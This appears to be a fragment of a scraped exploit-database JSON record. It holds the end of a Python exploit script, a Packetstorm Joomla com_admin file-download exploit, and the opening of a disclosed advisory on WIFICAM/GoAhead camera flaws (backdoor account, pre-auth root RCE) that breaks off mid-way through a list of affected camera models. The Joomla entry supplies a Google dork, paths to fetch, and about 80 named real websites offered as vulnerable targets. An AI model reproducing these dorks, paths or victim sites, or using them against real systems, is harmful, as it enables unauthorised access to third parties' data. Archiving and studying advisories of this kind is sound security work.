failed:\",str(e)\r\n sys.exit(1)\r\n \r\n if noexploit:\r\n print \"\\n[*] Not exploiting, no shell...\\n\"\r\n else:\r\n print \"\\n[*] All done, enjoy the shell...\\n\"\r\n \r\n#\r\n# [EOF]\r\n#\n\n# 0day.today [2018-03-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25439"}], "packetstorm": [{"lastseen": "2018-11-26T10:22:16", "description": "", "published": "2018-11-22T00:00:00", "type": "packetstorm", "title": "Joomla Admin 3.7.4 Database Disclosure", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-22T00:00:00", "id": "PACKETSTORM:150433", "href": "https://packetstormsecurity.com/files/150433/Joomla-Admin-3.7.4-Database-Disclosure.html", "sourceData": "`################################################################################################# \n \n# Exploit Title : Joomla com_admin Components from V2.5.4 to V3.7.4 \nDatabase Backup Arbitrary File Download Vulnerability \n# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security \nArmy \n# Date : 19/11/2018 \n# Vendor Homepage : joomla.org \n+ \ngithub.com/joomla-projects/gsoc18_override_management/tree/master/administrator/components/com_admin \n# Tested On : Windows and Linux \n# Category : WebApps \n# Version Information : V2.5.4 - V2.5.6 - V2.5.7 - V3.0.0 3.0.1 \nV3.0. V3.0.3 V3.1.0 V3.1.1 V3.1.2 V3.1.3 V3.1.4 V3.1.5 V3.2.0 V3.2.1 \nV3.4.0 V3.7.4 and if etcetera.... \n# Google Dorks : inurl:''/administrator/components/com_admin/sql/'' \n# Exploit Risk : Medium \n# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] \nCWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] \n \n################################################################################################# \n \n# Admin Panel Login Path : \n \n/administrator \n \n################################################################################################# \n \n# Exploit : \n \nCheck this folders => \n \n/joomla/administrator/components/com_admin/sql/others/mysql/...... \n \n/PATH/PATH/administrator/components/com_admin/sql/others/mysql/...... \n \n/PATH/administrator/components/com_admin/sql/updates/mysql/...... \n \n/administrator/components/com_admin/sql/updates/mysql/...... \n \n/administrator/components/com_admin/sql/updates/postgresql/....... \n \n/administrator/components/com_admin/sql/updates/sqlazure/...... \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql \n \n/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql \n \n/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql \n \n/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql \n \n################################################################################################# \n \n# Example Vulnerable Sites => \n \n[+] \nxpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql \n \n[+] \ncolegiosanpedroclaver.edu.co/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql \n \n[+] \nfreightdb.kzntransport.gov.za/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql \n \n[+] \nspeccontrol.pl/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n[+] \nintegratedfg.com/administrator/components/com_admin/sql/updates/mysql/2.5.9.sql \n \n[+] \nelroyce.com/home/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n[+] \ngroupepromotran.net/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n[+] \nclicdesourischemille.fr/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql \n \n[+] \nelmwoodnebraska.com/nl/administrator/components/com_admin/sql/updates/postgresql/3.9.0-2018-06-14.sql \n \n[+] \nkkn.cz/gdpr/administrator/components/com_admin/sql/updates/mysql/3.2.1.sql \n \n[+] \nflauzac.eu/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql \n \n[+] \ncd06ffme.fr/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.15.sql \n \n[+] \nalcbrh.com/supp%209/joomla/administrator/components/com_admin/sql/updates/postgresql/3.2.0.sql \n \n[+] \nsunshrine.com/administrator/components/com_admin/sql/updates/mysql/2.5.14.sql.encrypted \n \n[+] \nmurraynebraska.com/nl/administrator/components/com_admin/sql/updates/sqlazure/3.2.1.sql \n \n[+] \nwitecc.com/wit/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql \n \n[+] \nrecursosvirtualesperu.com/joomla/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql \n \n[+] \nlibrary.franklincountyva.gov/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql \n \n[+] \ntgr.org.hk/administrator/components/com_admin/sql/updates/postgresql/3.1.1.sql \n \n[+] \nsheltonbeach.org/administrator/components/com_admin/sql/updates/sqlazure/2.5.9.sql \n \n[+] \nlabarjaque.com/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql \n \n[+] \nvir.nw.ru/test/vir.nw/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql \n \n[+] \ngammarth-immobiliere.tn/new/administrator/components/com_admin/sql/updates/postgresql/3.1.3.sql \n \n[+] \nhfcforestry.com/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql \n \n[+] \nclickhouseghana.com/EchoStop/administrator/components/com_admin/sql/updates/postgresql/3.4.4-2015-07-11.sql \n \n[+] \nseaportsa.com/es/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n[+] \navagarrett.net/__MACOSX/bt_education_v3.0.0_j25_quickstart/administrator/components/com_admin/sql/updates/mysql/._1.7.0.sql \n \n[+] \nsuntechmed.com/__MACOSX/suntechmed15/administrator/components/com_admin/sql/updates/sqlazure/._3.1.3.sql \n \n[+] \nvillaalena.cz/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql \n \n[+] \ncolo-passion.fr/site/videoprivate/administrator/components/com_admin/sql/updates/sqlazure/2.5.21.sql \n \n[+] \ncosemsmg.org.br/site/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql \n \n[+] \ndjabugay.org.au/Joomla/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql \n \n[+] \nstoneandequipment.com/panama/administrator/components/com_admin/sql/updates/postgresql/3.1.5.sql \n \n[+] \nbrisbug.asn.au/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql \n \n[+] \nlopes.im/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql \n \n[+] \ninstitutoagricola.com/administrator/components/com_admin/sql/updates/sqlazure/3.7.4-2017-07-05.sql \n \n[+] \noperaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n[+] \nbillybobproducts.com/whitetaleslodge/administrator/components/com_admin/sql/updates/mysql/1.7.0.sql \n \n[+] \noperaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/3.0.1.sql \n \n[+] \narnes.si/~sspmmetl/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql \n \n[+]wenscom.it/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql \n \n[+] \ncheerleading.com.sg/events/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-09-16.sql \n \n[+] \nosm.chiangrai.net/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n[+] \ndatacomplete.com/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql \n \n[+] \nmail.nisselwater.com/joomla30/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql \n \n[+] \nhcerstein.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.13.sql \n \n[+] \nepmanagementconsult.com/__MACOSX/administrator/components/com_admin/sql/updates/mysql/._3.1.1.sql \n \n[+] \nmvapower.com/MVASITE/administrator/components/com_admin/sql/updates/mysql/3.0.1.sql \n \n[+] \nallamericanbailbonds.com/__MACOSX/allamericanbailbonds.com/administrator/components/com_admin/sql/updates/mysql/._2.5.6.sql \n \n[+] \nmunicipalidadelbosque.cl/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n[+] \nyurtyay.com.tr/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql \n \n[+] \nuniversoautista.com.br/portal/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql \n \n[+] \nhoefelmayr.net/Joomla/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql \n \n[+] \npatrioticsolutions.com/sites/askkarate/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql \n \n[+] \nhazelgreenfire.org/home/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql \n \n[+] \nmisioneritasarcadsa.com.ar/Joomla/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql \n \n[+] \nstaszickutno.pl/jbip/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-06.sql \n \n[+] \npkiakks.org/web2/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql \n \n[+] \nctnanotubos.com.br/projetos/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-12-03.sql \n \n[+] \ndev.intellizim.com/ppeinternational/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n[+] \npositanolirica.com.ar/positano/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql \n \n[+] \nreptileone.com.au/__MACOSX/shaper_awetive_quickstart_j3/administrator/components/com_admin/sql/updates/mysql/._2.5.11.sql \n \n[+] \nsportxanalitix.com/home/administrator/components/com_admin/sql/updates/mysql/3.6.0-2016-04-06.sql \n \n[+] \ntecso.com.mx/v2/__MACOSX/blog/administrator/components/com_admin/sql/updates/mysql/._3.0.1.sql \n \n[+] \nkohinoortarpaulin.net/administrator/components/com_admin/sql/updates/sqlazure/3.1.1.sql \n \n[+] \nraphstudio.com.br/site/v1/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql \n \n[+] \nfotozrak.mk/print/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql \n \n[+] \nidealkorpus.com/pt/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql \n \n[+] \nateliedearomas.com.br/atelie/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n[+] \nbristolacneremoval.co.uk/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n[+] \nmoob.cl/clientes/__MACOSX/puc/administrator/components/com_admin/sql/others/mysql/._utf8mb4-conversion-01.sql \n \n[+] \nskansjofrakt.se/joo2/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql \n \n[+] \nutilsoluciones.com/en/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql \n \n[+] \nigorgalic.freeserverhost.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.1-2012-01-26.sql \n \n################################################################################################# \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n################################################################################################# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150433/jooomlaadmin374-disclose.txt"}, {"lastseen": "2017-03-09T17:15:32", "description": "", "published": "2017-03-09T00:00:00", "type": "packetstorm", "title": "Wireless IP Camera (P2P) WIFICAM GoAhead Backdoor / Remote Command Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-03-09T00:00:00", "id": "PACKETSTORM:141523", "href": "https://packetstormsecurity.com/files/141523/Wireless-IP-Camera-P2P-WIFICAM-GoAhead-Backdoor-Remote-Command-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA512 \n \n \n## Advisory Information \n \nTitle: Multiple vulnerabilities found in Wireless IP Camera (P2P) \nWIFICAM cameras and vulnerabilities in GoAhead \nAdvisory URL: https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt \nBlog URL: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nDate published: 2017-03-08 \nVendors contacted: None \nRelease mode: Released \nCVE: no current CVE \n \n \n \n## Product Description \n \nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which \nallows to stream remotely. \n \n \n[please visit the HTML version at \nhttps://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html \nto see the image] \n \n \n \n## Vulnerabilities Summary \n \nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed \nwith a lot of vulnerabilities. \nThis camera is very similar to a lot of other Chinese cameras. \n \nIt seems that a generic camera is being sold by a Chinese company in \nbulk (OEM) and \nthe buyer companies resell them with custom software development and \nspecific branding. Wireless IP Camera (P2) WIFICAM is one of the \nbranded cameras. \n \nSo, cameras are sold under different names, brands and functions. The HTTP \ninterface is different for each vendor but shares the same vulnerabilities. \n \n \nBecause of code reusing, the vulnerabilities are present in a huge \nlist of cameras (especially the InfoLeak and the RCE), \nwhich allow to execute root commands against 1250+ camera models with \na pre-auth vulnerability. \n \n \nThe summary of the vulnerabilities is: \n \n1. Backdoor account \n2. RSA key and certificates \n3. Pre-Auth Info Leak (credentials) within the GoAhead http server \n4. Authenticated RCE as root \n5. Pre-Auth RCE as root \n6. Misc - Streaming without authentication \n7. Misc - \"Cloud\" (Aka Botnet) \n \n \nThe vulnerabilities in the Cloud management affect a lot of P2P or \n\"Cloud\" cameras. \n \nMy tests have shown that the InfoLeak affecting the GoAhead server \nrunning on the camera affects at least 1250+ camera models. It can be \nused to execute the RCE as root. \nThus, these cameras are likely affected by a pre-auth RCE as root: \n \n \n3G+IPCam Other \n3SVISION Other \n3com CASA \n3com Other \n3xLogic Other \n3xLogic Radio \n4UCAM Other \n4XEM Other \n555 Other \n7Links 3677 \n7Links 3677-675 \n7Links 3720-675 \n7Links 3720-919 \n7Links IP-Cam-in \n7Links IP-Wi-Fi \n7Links IPC-760HD \n7Links IPC-770HD \n7Links Incam \n7Links Other \n7Links PX-3615-675 \n7Links PX-3671-675 \n7Links PX-3720-675 \n7Links PX3309 \n7Links PX3615 \n7Links ipc-720 \n7Links px-3675 \n7Links px-3719-675 \n7Links px-3720-675 \nA4Tech Other \nABS Other \nADT RC8021W \nAGUILERA AQUILERA \nAJT AJT-019129-BBCEF \nALinking ALC \nALinking Other \nALinking dax \nAMC Other \nANRAN ip180 \nAPKLINK Other \nAQUILA AV-IPE03 \nAQUILA AV-IPE04 \nAVACOM 5060 \nAVACOM 5980 \nAVACOM H5060W \nAVACOM NEW \nAVACOM Other \nAVACOM h5060w \nAVACOM h5080w \nAcromedia IN-010 \nAcromedia Other \nAdvance Other \nAdvanced+home lc-1140 \nAeoss J6358 \nAetos 400w \nAgasio A500W \nAgasio A502W \nAgasio A512 \nAgasio A533W \nAgasio A602W \nAgasio A603W \nAgasio Other \nAirLink Other \nAirmobi HSC321 \nAirsight Other \nAirsight X10 \nAirsight X34A \nAirsight X36A \nAirsight XC39A \nAirsight XX34A \nAirsight XX36A \nAirsight XX40A \nAirsight XX60A \nAirsight x10 \nAirsight x10Airsight \nAirsight xc36a \nAirsight xc49a \nAirsight xx39A \nAirsight xx40a \nAirsight xx49a \nAirsight xx51A \nAirsight xx51a \nAirsight xx52a \nAirsight xx59a \nAirsight xx60a \nAkai AK7400 \nAkai SP-T03WP \nAlecto 150 \nAlecto Atheros \nAlecto DVC-125IP \nAlecto DVC-150-IP \nAlecto DVC-1601 \nAlecto DVC-215IP \nAlecto DVC-255-IP \nAlecto dv150 \nAlecto dvc-150ip \nAlfa 0002HD \nAlfa Other \nAllnet 2213 \nAllnet ALL2212 \nAllnet ALL2213 \nAmovision Other \nAndroid+IP+cam IPwebcam \nAnjiel ip-sd-sh13d \nApexis AH9063CW \nApexis APM-H803-WS \nApexis APM-H804-WS \nApexis APM-J011 \nApexis APM-J011-Richard \nApexis APM-J011-WS \nApexis APM-J012 \nApexis APM-J012-WS \nApexis APM-J0233 \nApexis APM-J8015-WS \nApexis GENERIC \nApexis H \nApexis HD \nApexis J \nApexis Other \nApexis PIPCAM8 \nApexis Pyle \nApexis XF-IP49 \nApexis apexis \nApexis apm- \nApexis dealextreme \nAquila+Vizion Other \nArea51 Other \nArmorView Other \nAsagio A622W \nAsagio Other \nAsgari 720U \nAsgari Other \nAsgari PTG2 \nAsgari UIR-G2 \nAtheros ar9285 \nAvantGarde SUMPPLE \nAxis 1054 \nAxis 241S \nB-Qtech Other \nB-Series B-1 \nBRAUN HD-560 \nBRAUN HD505 \nBeaulieu Other \nBionics Other \nBionics ROBOCAM \nBionics Robocam \nBionics T6892WP \nBionics t6892wp \nBlack+Label B2601 \nBravolink Other \nBreno Other \nCDR+king APM-J011-WS \nCDR+king Other \nCDR+king SEC-015-C \nCDR+king SEC-016-NE \nCDR+king SEC-028-NE \nCDR+king SEC-029-NE \nCDR+king SEC-039-NE \nCDR+king sec-016-ne \nCDXX Other \nCDXXcamera Any \nCP+PLUS CP-EPK-HC10L1 \nCPTCAM Other \nCamscam JWEV-372869-BCBAB \nCasa Other \nCengiz Other \nChinavasion Gunnie \nChinavasion H30 \nChinavasion IP611W \nChinavasion Other \nChinavasion ip609aw \nChinavasion ip611w \nCloud MV1 \nCloud Other \nCnM IP103 \nCnM Other \nCnM sec-ip-cam \nCompro NC150/420/500 \nComtac CS2 \nComtac CS9267 \nConceptronic CIPCAM720PTIWL \nConceptronic cipcamptiwl \nCybernova Other \nCybernova WIP604 \nCybernova WIP604MW \nD-Link DCS-910 \nD-Link DCS-930L \nD-Link L-series \nD-Link Other \nDB+Power 003arfu \nDB+Power DBPOWER \nDB+Power ERIK \nDB+Power HC-WV06 \nDB+Power HD011P \nDB+Power HD012P \nDB+Power HD015P \nDB+Power L-615W \nDB+Power LA040 \nDB+Power Other \nDB+Power Other2 \nDB+Power VA-033K \nDB+Power VA0038K \nDB+Power VA003K+ \nDB+Power VA0044_M \nDB+Power VA033K \nDB+Power VA033K+ \nDB+Power VA035K \nDB+Power VA036K \nDB+Power VA038 \nDB+Power VA038k \nDB+Power VA039K \nDB+Power VA039K-Test \nDB+Power VA040 \nDB+Power VA390k \nDB+Power b \nDB+Power b-series \nDB+Power extcams \nDB+Power eye \nDB+Power kiskFirstCam \nDB+Power va033k \nDB+Power va039k \nDB+Power wifi \nDBB IP607W \nDEVICECLIENTQ CNB \nDKSEG Other \nDNT CamDoo \nDVR DVR \nDVS-IP-CAM Other \nDVS-IP-CAM Outdoor/IR \nDagro DAGRO-003368-JLWYX \nDagro Other \nDericam H216W \nDericam H502W \nDericam M01W \nDericam M2/6/8 \nDericam M502W \nDericam M601W \nDericam M801W \nDericam Other \nDigix Other \nDigoo BB-M2 \nDigoo MM==BB-M2 \nDigoo bb-m2 \nDinon 8673 \nDinon 8675 \nDinon SEGEV-105 \nDinon segev-103 \nDome Other \nDrilling+machines Other \nE-Lock 1000 \nENSIDIO IP102W \nEOpen Open730 \nEST ES-IP602IW \nEST IP743W \nEST Other \nEZCam EPK-EP10L1 \nEZCam EZCam \nEZCam Other \nEZCam PAN/TILT \nEZCam Pan/Tilt \nEasyCam EC-101HD \nEasyCam EC-101HDSD \nEasyCam EC-101SD \nEasyCam EC-102 \nEasyCam Other \nEasyN 187 \nEasyN 1BF \nEasyN 720P \nEasyN F \nEasyN F-136 \nEasyN F-M136 \nEasyN F-M166 \nEasyN F-M181 \nEasyN F-M1b1 \nEasyN F-SERIES \nEasyN F133 \nEasyN F2-611B \nEasyN F3 \nEasyN F3-166 \nEasyN F3-176M \nEasyN F3-M166 \nEasyN F3-SERIES \nEasyN F3-Series \nEasyN F3-m187 \nEasyN F3M187 \nEasyN FS-613A-M136 \nEasyN FS-613B \nEasyN FS-613B-M166 \nEasyN FS-613B-MJPEG \nEasyN FS613 \nEasyN F_M10R \nEasyN H3-V10R \nEasyN H6-M137h \nEasyN M091 \nEasyN Other \nEasyN est-007660-611b \nEasyN est-007660333 \nEasyN f \nEasyN f-Series \nEasyN f138 \nEasyN f_series \nEasyN fseries \nEasyN kitch \nEasyN s \nEasySE F/B/N/I \nEasySE H3 \nEasySE H3e \nEasySE Other \nEbode IPV38W \nEbode IPV58 \nEbode Other \nEgo Other \nElro 901 \nElro 903 \nElro 903IP \nElro C7031P \nElro C703IP2 \nElro C704-IP \nElro C704IP \nElro C704IP.2 \nElro C704ip \nElro C803IP \nElro C903IP \nElro C903IP.2 \nElro C904IP \nElro C904IP.2 \nElro IP901 \nElro Other \nEminent 6564 \nEminent EM6220 \nEminent EM6564 \nEminent em6220 \nEsky C5900 \nEsky L \nEsky Live \nEsky c5900 \nEura-Tech IC-03C3 \nEyeCam ICAM-608 \nEyeCam IP65IW \nEyeCam Other \nEyeCam STORAGEOPTIONS \nEyeIPCam IP901W \nEyeSight ES-IP607W \nEyeSight ES-IP811W \nEyeSight ES-IP909IW \nEyeSight ES-IP935FW \nEyeSight ES-IP935IW \nEyeSight IP910IW \nEyeSight IP915IW \nEyeSight Other \nEyeSight ip609IW \nEyeSight ip909iw \nEyeSight ip915iw \nEyeSight mjpeg \nEyeSpy247 Other \nF-Series FSERIES \nF-Series Ip \nF-Series Other \nF-Series ip \nFirst+Concept Other \nFocuscam F19821W \nFoscam FI18904w \nFoscam FI18905E \nFoscam FI18905W \nFoscam FI18906w \nFoscam FI1890W \nFoscam FI18910E \nFoscam FI18910W \nFoscam FI18910w \nFoscam FI18916W \nFoscam FI18918W \nFoscam FI18919W \nFoscam FI19810W \nFoscam FI8094W \nFoscam FI81904W \nFoscam FI8601W \nFoscam FI8602W \nFoscam FI8606W \nFoscam FI8610w \nFoscam FI8903W \nFoscam FI8903W_Elita \nFoscam FI8904 \nFoscam FI8904W \nFoscam FI8905E \nFoscam FI8905W \nFoscam FI8905w \nFoscam FI8906w \nFoscam FI8907W \nFoscam FI8908W \nFoscam FI8909W \nFoscam FI890W \nFoscam FI8910 \nFoscam FI8910E \nFoscam FI8910W \nFoscam FI8910W_DW \nFoscam FI8910w \nFoscam FI8916W \nFoscam FI8918 \nFoscam FI89180w \nFoscam FI8918E \nFoscam FI8918W \nFoscam FI8918w \nFoscam FI8919W \nFoscam FI9804W \nFoscam FI9805E \nFoscam FI9810 \nFoscam FI9810W \nFoscam FI9818 \nFoscam FI9820w \nFoscam FI9821W \nFoscam FI9821w \nFoscam FL8910 \nFoscam FS18908W \nFoscam FS8910 \nFoscam Fi8910 \nFoscam Other \nFoscam fI8989w \nFoscam fi1890w \nFoscam fl8910w \nFoxCam PTZ2084-L \nGIGA gb \nGT+ROAD HS-006344-SPSLM \nGeneral Other \nGeneric All-in-one \nGeneric Billy \nGeneric DomeA-Outdoor \nGeneric IP \nGeneric Other \nGi-star+srl IP6031W \nGigaeye GB \nGoAhead EC-101SD \nGoAhead GoAheadWebs \nGoAhead IPCAM1 \nGoAhead IPCAM2 \nGoAhead Other \nGoAhead thedon \nGoCam Other \nGoclever EYE \nGoclever EYE2 \nGotake GTK-TH01B \nH+264+network+DVR 720p \nH+264+network+DVR Other \nH.264 Other \nH6837WI Other \nHD+IPC Other \nHD+IPC SV3C \nHDIPCAM Other \nHeden CAMH04IPWE \nHeden CAMHED02IPW \nHeden CAMHED04IP \nHeden CAMHED04IPWN \nHeden CAMHEDIPWP \nHeden Other \nHeden VisionCam \nHeden visionCam \nHiSilicon Other \nHikvision DS-2CD2132 \nHistream RTSP \nHooToo F-SERIES \nHooToo HOOTOO \nHooToo HT-IP006 \nHooToo HT-IP006N \nHooToo HT-IP009HDP \nHooToo HT-IP206 \nHooToo HT-IP207F \nHooToo HT-IP210HDP \nHooToo HT-IP210P \nHooToo HT-IP212 \nHooToo IP009HDP \nHooToo Other \nHooToo apm-h803-mpc \nHsmartlink Other \nHungtek WIFI \nICAMView Other \nICam I908W \nICam IP-1 \nICam Other \nICam Other2 \nICam dome \nINISOFT-CAM Stan \nINSTAR 4010 \nINVID Other \nIO+Data Other \nIP66 Other \nIPC IPC02 \nIPC Other \nIPC S5030-TF \nIPC S5030-m \nIPC SRICAM \nIPCC 3XPTZ \nIPCC 7210W \nIPCC IPCC-7210W \nIPCC x01 \nIPTeles Other \nIPUX ip-100 \nISIT Other \nIZOtech Other \nIZTOUCH 0009 \nIZTOUCH A001 \nIZTOUCH IZ-009 \nIZTOUCH LTH-A8645-c15 \nIZTOUCH Other \nIZTOUCH Other1 \nIZTOUCH ap001 \nIeGeek Other \nIeGeek ukn \nInkovideo V-104 \nIprobot3 Other \nJRECam JM3866W \nJWcam JWEV \nJWcam Other \nJaycar 3834 \nJaycar 720P \nJaycar Other \nJaycar QC-3831 \nJaycar QC-3832 \nJaycar QC-3834 \nJaycar QC-3836 \nJaycar QC-3839 \nJaytech IP6021W \nJhempCAM Back \nJhempCAM Other \nKaiKong 1601 \nKaiKong 1602w \nKaiKong Other \nKaiKong SIP \nKaiKong SIP1602 \nKaiKong SIP1602W \nKaiKong sip \nKaiKong sip1602w \nKenton gjc02 \nKinson C720PWIP \nKlok Other \nKnewmart KW01B \nKnewmart KW02B \nKogan KAIPC01BLKA \nKogan KAIPCO1BLKA \nKogan Other \nKogan encoder \nKogan kaipc01blkb \nKompernass IUK \nKoolertron Other \nKoolertron PnP \nKoolertron SP-SHEX21-SL \nLC+security Other \nLW lw-h264tf \nLYD H1385H \nLager Other \nLeadtek C351 \nLevelOne 1010/2010 \nLibor Other \nLifeTech MyLifeTech \nLifeTech Other \nLifeTech dd \nLilly Other \nLinq Other \nLloyds 1107 \nLoftek CXS \nLoftek Nexus \nLoftek Other \nLoftek SPECTOR \nLoftek Sendinel \nLoftek Sentinel \nLogiLink WC0030A \nLogiLink wc0044 \nLogitech C920 \nMCL 610 \nMJPEG Other \nMaginon 100 \nMaginon 10AC \nMaginon 20C \nMaginon IP-20c \nMaginon IPC \nMaginon IPC-1 \nMaginon IPC-10 \nMaginon IPC-100 \nMaginon IPC-100AC \nMaginon IPC-10AC \nMaginon IPC-2 \nMaginon IPC-20 \nMaginon IPC20C \nMaginon IPC_1A \nMaginon Other \nMaginon SUPRA \nMaginon Supra \nMaginon ipc \nMaginon ipc-1a \nMaginon ipc100a \nMaginon ipx \nMaginon w2 \nMarmitek GM-8126 \nMaygion IP \nMaygion OTHER2 \nMaygion Other \nMaygion V3 \nMaygion black \nMediatech mt4050 \nMedisana SmartBabyMonitor \nMerlin IP \nMerlin Other \nMerlin vstc \nMessoa Other \nMingyoushi S6203Y-WR \nMomentum 2002 \nMomentum MO-CAM \nNEXCOM S-CAM \nNIP NIP-004500-KMTLU \nNIP NIP-075007-UPHTF \nNIP NIP-11BGPW \nNIP NIP-14 \nNTSE Other \nNeewer Other \nNeewer V-100 \nNeo+CoolCam NIP \nNeo+CoolCam NIP-02(OAM) \nNeo+CoolCam NIP-06 \nNeo+CoolCam NIP-066777-BWESL \nNeo+CoolCam NIP-102428-DFBEF \nNeo+CoolCam NIP-H20(OZX) \nNeo+CoolCam OBJ-007260-LYLDU \nNeo+CoolCam Other \nNeo+CoolCam neo \nNeo+CoolCam nip-11 \nNeo+CoolCam nip-20 \nNess Other \nNetView Other \nNetcam Dual-HD \nNetcam HSL-232245-CWXES \nNetcam OUVIS \nNetcam Other \nNetware Other \nNexxt+Solution Xpy \nNixzen Other \nNorthQ NQ-9006 \nOffice+One CM-I11123BK \nOffice+One IP-900 \nOffice+One IP-99 \nOffice+One Other \nOffice+One SC-10IP \nOffice+One ip-900 \nOffice+One ip900 \nOpexia OPCS \nOptica+Video FI-8903W \nOptica+Video FI-8918W \nOptica+Video Other \nOtto 4eye \nOvermax CamSpot \nOvermax Camspot \nOwlCam CP-6M201W \nP2p wificam \nPCS Other \nPanasonic BL-C131A \nPeopleFu IPC-674 \nPeopleFu IPCAM1 \nPeopleFu IPCAM2 \nPeopleFu IPCAM3 \nPeopleFu IPCAM5 \nPixpo 1Z074A2A0301627785 \nPixpo PIX006428BFYZY \nPixpo PIX009491MLJYM \nPixpo PIX009495HURFE \nPixpo PIX010584DFACE \nPlaisio IP \nPlanex Other \nPlanex PLANEX \nPolariod P351S \nPolaroid IP-100 \nPolaroid IP-101W \nPolaroid IP-200B \nPolaroid IP-201B \nPolaroid IP-350 \nPolaroid IP-351S \nPolaroid IP-360S \nPolaroid IP-810W \nPolaroid IP-810WZ \nPolaroid Other \nPolaroid POLIP101W \nPolaroid POLIP201B \nPolaroid POLIP201W \nPolaroid POLIP351S \nPolaroid POLIP35i5 \nPowerLead Caue \nPowerLead PC012 \nProveCam IP2521 \nProvision 717 \nProvision F-717 \nProvision F-737 \nProvision PT-737 \nProvision WP-711 \nProvision WP-717P \nPyle HD \nPyle HD22 \nPyle HD46 \nPyle Mine \nPyle PIPCAM15 \nPyle Pipcam12 \nPyle cam5 \nPyle pipcam25 \nPyle pipcam5 \nQ-nest QN-100S \nQ-nest qn-100s \nQueback 720p \nROCAM NC-400 \nROCAM NC-500 \nROCAM NC300 \nROCAM NC300-1 \nROHS IP \nROHS none \nRTX 06R \nRTX DVS \nRTX IP-06R \nRTX IP-26H \nRTX Other \nRollei safetycam-10hd \nSES Other \nSKJM Other \nSST SST-CNS-BUI18 \nSVB+International SIP-018262-RYERR \nSafeHome 278042 